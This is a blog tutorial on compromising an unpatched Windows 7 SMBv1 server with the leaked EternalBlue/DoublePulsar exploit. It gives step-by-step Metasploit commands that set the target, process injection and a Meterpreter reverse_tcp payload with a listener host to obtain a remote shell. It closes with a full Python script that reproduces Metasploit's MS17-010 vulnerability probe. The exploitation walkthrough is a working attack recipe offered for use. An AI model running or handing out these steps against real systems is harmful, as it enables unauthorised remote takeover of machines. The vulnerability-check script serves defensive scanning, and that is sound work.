Hacking Windows Server using EternalBlue Exploit

Introduction

EternalBlue is an exploit developed and used by the United States National Security Agency (NSA). It was leaked by the hacker group known as the Shadow Brokers in April 2017, and within weeks the leaked code was driving the worldwide WannaCry ransomware outbreak and then the NotPetya attack, both with devastating effects. The exploit targets a flaw in the Server Message Block version 1 (SMBv1) server in Windows. SMB is the protocol Windows machines use to share files and printers over a network, and the server listens on TCP port 445. A vulnerable SMBv1 server mishandles specially crafted requests, and an unauthenticated attacker on the network can use that to execute code on the machine in kernel mode. The vulnerability is tracked as CVE-2017-0144 and was patched by Microsoft in security bulletin MS17-010 in March 2017, a month before the leak; the machines hit by WannaCry were the ones that had not applied it.

So let’s start with our demo

Our Victim: Windows 7 (IP address: 192.168.0.103)

Our Attacker: Kali (IP address: 192.168.0.105)


Before starting, make sure wine is installed on your Kali machine. This module does not reimplement the exploit in Ruby: it drives the leaked EternalBlue and DoublePulsar Windows executables, so it needs wine (a compatibility layer that runs Windows .exe files on Linux), and the 32-bit wine build in particular because the leaked binaries are 32-bit. If it is not installed, run the following as root:

dpkg --add-architecture i386

apt-get update

apt-get install wine32

Next, we need to download the exploit module and place it in Metasploit's module tree (not its database; the database only holds hosts, services and loot).

The module is published by ElevenPaths at the following link: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Go to your terminal and, as root, type:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Cloning as root matters because the module's ETERNALBLUEPATH and DOUBLEPULSARPATH options default to the deps/ folder of the clone under /root; that is where it expects to find the leaked Eternalblue-2.2.0.exe and Doublepulsar-1.3.1.exe binaries.

Now go to the folder where the exploit has been cloned.

Copy the eternalblue_doublepulsar.rb file into the following directory: /usr/share/metasploit-framework/modules/exploits/windows/smb/ (one path, no space, and the folder is "modules", not "module"). Leave the rest of the clone where it is so the paths above stay valid.

Now that everything is set up, start the Metasploit framework by typing msfconsole. If msfconsole was already running when you copied the file, type reload_all so it picks up the new module.

Now search for the EternalBlue exploit with search eternalblue. The copied module should appear alongside Metasploit's own MS17-010 modules.

Now type the following to use the DoublePulsar exploit:

use exploit/windows/smb/eternalblue_doublepulsar

then type: show options

to list the options that we need to fill in. Check here that ETERNALBLUEPATH, DOUBLEPULSARPATH and WINEPATH point at existing directories; if the module cannot find the binaries it fails before ever touching the target.

Next we need to set the target host and the process that DoublePulsar will inject the payload DLL into. PROCESSINJECT is an injection target, not a Meterpreter migrate: the payload runs inside that process from the start, which is why explorer.exe, always present on a logged-in desktop, is a common choice. Also check TARGETARCHITECTURE: it defaults to x86, so for a 64-bit Windows 7 set it to x64, otherwise the injection fails. Type the following commands:

set RHOST 192.168.0.103

set PROCESSINJECT explorer.exe

Now we need a payload that gives us a reverse connection to Meterpreter. Its architecture must match TARGETARCHITECTURE and the victim; for a 64-bit Windows 7:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Set the host that will listen for the reverse connection (the attacker's IP address):

set LHOST 192.168.0.105

Now that everything is set up, just type exploit. The module runs the EternalBlue binary under wine to plant the DoublePulsar backdoor on the target, then instructs DoublePulsar to inject the Meterpreter DLL into the chosen process, which connects back to LHOST.

That gives us a Meterpreter session. Now type shell to get a command prompt on the victim machine.

NOTE: Metasploit also has a module to check whether the victim machine is vulnerable before you fire the exploit: auxiliary/scanner/smb/smb_ms17_010. Use it, set RHOSTS (plural, as for every scanner module) to the target, and run it. The check is non-destructive: it opens a null session to the IPC$ share and sends a PeekNamedPipe transaction for a file ID of 0; an unpatched server answers with STATUS_INSUFF_SERVER_RESOURCES, while a patched one answers STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. Check first, then carry out the attack as explained above.
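The scanner note above describes the probe in words; what follows is the same check as a stand-alone Python 3 script, so you can see what smb_ms17_010 actually sends over the wire. This is an added example written for this page, not the Metasploit module's code and not part of the original post. It speaks raw SMBv1 to TCP 445: negotiate the NT LM 0.12 dialect, set up a null session, connect to the IPC$ tree, then send an SMB_COM_TRANSACTION carrying the PeekNamedPipe subcommand against FID 0 and classify the NT status in the reply. The victim address 192.168.0.103 is the demo's; the function names, the Flags2 and capability values, the "Unix"/"python" native-OS strings and the verdict labels are my own choices.

```python
"""MS17-010 check over raw SMBv1, mirroring Metasploit's smb_ms17_010 probe.
Added example for this page (assumed names and values are marked); not the module's code."""
import socket
import struct
import sys

# NT status codes (MS-ERREF) that the PeekNamedPipe probe distinguishes.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched srv.sys: likely vulnerable
STATUS_ACCESS_DENIED = 0xC0000022            # patched
STATUS_INVALID_HANDLE = 0xC0000008           # patched

def netbios(smb):
    """Prefix an SMB message with the 4-byte NetBIOS session service header."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def smb_header(cmd, status=0, tid=0, uid=0, mid=1):
    """32-byte SMBv1 header. Flags 0x18 and Flags2 0x4001 (long names + 32-bit NT status,
    no Unicode, no extended security) are my choice: they keep the replies simple to parse."""
    return struct.pack("<4sBIBHHQHHHHH", b"\xffSMB", cmd, status, 0x18, 0x4001,
                       0, 0, 0, tid, 0xFEFF, uid, mid)

def parse_header(smb):
    """Extract command, NT status, TID and UID from a reply (NetBIOS prefix already removed)."""
    if len(smb) < 32 or smb[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    cmd, status = struct.unpack_from("<BI", smb, 4)
    tid = struct.unpack_from("<H", smb, 24)[0]
    uid = struct.unpack_from("<H", smb, 28)[0]
    return {"cmd": cmd, "status": status, "tid": tid, "uid": uid}

def negotiate():
    """SMB_COM_NEGOTIATE (0x72): offer the classic dialects, ending in NT LM 0.12."""
    dialects = b"\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00"
    return netbios(smb_header(0x72) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)

def session_setup():
    """SMB_COM_SESSION_SETUP_ANDX (0x73), 13-word pre-extended-security form, as a
    null session: zero-length passwords, empty account name and domain."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 10, 0, 0, 0, 0, 0, 0x50)
    blob = b"\x00\x00" + b"Unix\x00" + b"python\x00"   # account, domain, native OS, native LAN manager (assumed)
    return netbios(smb_header(0x73) + b"\x0d" + words + struct.pack("<H", len(blob)) + blob)

def tree_connect(ip, uid):
    """SMB_COM_TREE_CONNECT_ANDX (0x75) to the IPC$ share, the tree the probe needs."""
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)        # AndX chain end, flags, password length
    blob = b"\x00" + ("\\\\%s\\IPC$" % ip).encode() + b"\x00?????\x00"
    return netbios(smb_header(0x75, uid=uid) + b"\x04" + words + struct.pack("<H", len(blob)) + blob)

def peek_named_pipe(tid, uid):
    """SMB_COM_TRANSACTION (0x25) with PeekNamedPipe (setup word 0x23) on FID 0.
    Parameter/data offsets point just past the name, 74 bytes into the SMB message."""
    words = struct.pack("<HHHHBBHIHHHHHBBHH",
                        0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,   # total/max counts, flags, timeout, reserved
                        0, 74, 0, 74,                          # ParameterCount/Offset, DataCount/Offset
                        2, 0, 0x23, 0)                         # SetupCount, reserved, PeekNamedPipe, FID 0
    name = b"\\PIPE\\\x00"
    return netbios(smb_header(0x25, tid=tid, uid=uid) + b"\x10" + words + struct.pack("<H", len(name)) + name)

def classify(status):
    """Map the NT status of the PeekNamedPipe reply to a verdict, as the scanner does."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "PATCHED"
    return "UNKNOWN"

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed by target")
        buf += chunk
    return buf

def exchange(sock, pkt):
    """Send one request, read one NetBIOS-framed reply, return the SMB bytes."""
    sock.sendall(pkt)
    length = int.from_bytes(recv_exact(sock, 4)[1:], "big")
    return recv_exact(sock, length)

def check_host(ip, port=445, timeout=5.0):
    """Run the four-message probe against one host; returns VULNERABLE, PATCHED or UNKNOWN."""
    with socket.create_connection((ip, port), timeout) as sock:
        for pkt in (negotiate(), session_setup()):
            reply = parse_header(exchange(sock, pkt))
            if reply["status"] != 0:
                raise RuntimeError("setup failed, NT status 0x%08X" % reply["status"])
        uid = reply["uid"]
        reply = parse_header(exchange(sock, tree_connect(ip, uid)))
        if reply["status"] != 0:
            raise RuntimeError("IPC$ tree connect failed, NT status 0x%08X" % reply["status"])
        reply = parse_header(exchange(sock, peek_named_pipe(reply["tid"], uid)))
        return classify(reply["status"])

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.103"   # the demo's victim IP
    print("%s: %s" % (target, check_host(target)))
```

Run it as python3 ms17_010_check.py 192.168.0.103 against a machine you own. It only asks the server a question and never triggers the bug, so it is safe to point at production hosts, but it does depend on a null session to IPC$ being permitted, which is the Windows default; a host that rejects the session setup or tree connect will raise rather than report a verdict.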

So that’s for now. See you next time. Goodbye

You can also have a look at my previous article on Web Application Security.


2 Responses

  1. anonymous says:

    Knowledgeable post. Thank you. ~blackshark-3215
